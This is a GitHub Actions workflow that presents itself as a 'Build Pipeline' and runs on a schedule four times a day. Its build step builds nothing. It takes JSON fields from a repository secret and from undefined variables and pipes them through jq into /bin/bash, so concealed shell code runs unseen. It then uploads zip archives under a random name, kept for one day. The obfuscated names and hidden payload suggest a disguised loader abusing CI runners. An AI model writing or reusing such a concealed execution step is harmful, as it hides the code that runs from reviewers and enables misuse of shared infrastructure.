name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '41 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          uto9: ${{ secrets.uto9 }}
        run: |
          printf '%s' "$uto9" | jq -r .f12 | /bin/bash
          printf '%s' "$ogoo63" | jq -r .f741 | /bin/bash
          echo $eqkta930 | jq -r .u22 | /bin/bash
          echo $dtai33624 | jq -r .uf1579 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: I46VvG47
          path: "*.zip"
          retention-days: 1
